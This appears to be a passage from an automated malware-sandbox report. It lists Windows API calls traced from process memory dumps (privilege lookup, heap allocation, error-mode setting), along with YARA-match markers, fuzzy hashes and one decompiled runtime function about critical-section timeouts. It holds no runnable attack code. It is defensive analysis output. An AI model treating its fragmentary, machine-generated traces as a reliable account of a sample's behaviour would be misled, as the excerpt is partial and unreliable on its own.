                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,030BCFA2,030BCFA2,?,00000000,?,?), ref: 030C8660
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, Offset: 030B0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LookupPrivilegeValue
                                                          • String ID:
                                                          • API String ID: 3899507212-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(030C3516,?,030C3C8F,030C3C8F,?,030C3516,?,?,?,?,?,00000000,00000000,?), ref: 030C84BD
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, Offset: 030B0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SetErrorMode.KERNELBASE(00008003,?,?,030B7C63,?), ref: 030BD43B
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, Offset: 030B0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorMode
                                                          • String ID:
                                                          • API String ID: 2340568224-0
                                                          • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                          • Instruction ID: 1f27b63760e14819505bc9b7b82062b9063acda51bb778ebf6df8cce4475151b
                                                          • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                          • Instruction Fuzzy Hash: B2D0A7757603043BE610FFA89C03FA6B2CC5B54A10F494074F94DDB3C3DA54F4004565
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.473416218.0000000003720000.00000040.00000001.sdmp, Offset: 03720000, based on PE: true
                                                          • Associated: 00000008.00000002.474039791.000000000383B000.00000040.00000001.sdmp
                                                          • Associated: 00000008.00000002.474058438.000000000383F000.00000040.00000001.sdmp
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 783980d10aca55b4213111f1c2cea53fa724e40e233d817b25fb355af31f8628
                                                          • Instruction ID: b13a4b8026a3670c11bbafbcbe8a63de9e39cc4530c883df8ba9742da2e95b77
                                                          • Opcode Fuzzy Hash: 783980d10aca55b4213111f1c2cea53fa724e40e233d817b25fb355af31f8628
                                                          • Instruction Fuzzy Hash: CDB09B719414C5C9FA11E7605708737794477D5741F16C162D2020641A4778C491F5B5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          C-Code - Quality: 53%
                                                          			E037DFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                          				void* _t7;
                                                          				intOrPtr _t9;
                                                          				intOrPtr _t10;
                                                          				intOrPtr* _t12;
                                                          				intOrPtr* _t13;
                                                          				intOrPtr _t14;
                                                          				intOrPtr* _t15;
                                                          
                                                          				_t13 = __edx;
                                                          				_push(_a4);
                                                          				_t14 =  *[fs:0x18];
                                                          				_t15 = _t12;
                                                          				_t7 = E0378CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                          				_push(_t13);
                                                          				E037D5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                          				_t9 =  *_t15;
                                                          				if(_t9 == 0xffffffff) {
                                                          					_t10 = 0;
                                                          				} else {
                                                          					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                          				}
                                                          				_push(_t10);
                                                          				_push(_t15);
                                                          				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                          				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                          				return E037D5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                          			}











                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 037DFDFA
                                                          Strings
                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 037DFE2B
                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 037DFE01
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.473416218.0000000003720000.00000040.00000001.sdmp, Offset: 03720000, based on PE: true
                                                          • Associated: 00000008.00000002.474039791.000000000383B000.00000040.00000001.sdmp
                                                          • Associated: 00000008.00000002.474058438.000000000383F000.00000040.00000001.sdmp
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                          • API String ID: 885266447-3903918235
                                                          • Opcode ID: 618229b1b8f2371b55888312cfbf6341e4d52558c40d75121f00b5f2b720bfa9
                                                          • Instruction ID: 4ef7623e35064731d22ebd90756dda794cf8ead82091c445b6ce44bdbf62c5f5
                                                          • Opcode Fuzzy Hash: 618229b1b8f2371b55888312cfbf6341e4d52558c40d75121f00b5f2b720bfa9
                                                          • Instruction Fuzzy Hash: 10F02B76240601BFE7209B45DC06F23BF6AEB45730F244318F6285A1E2EA62F83097F0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%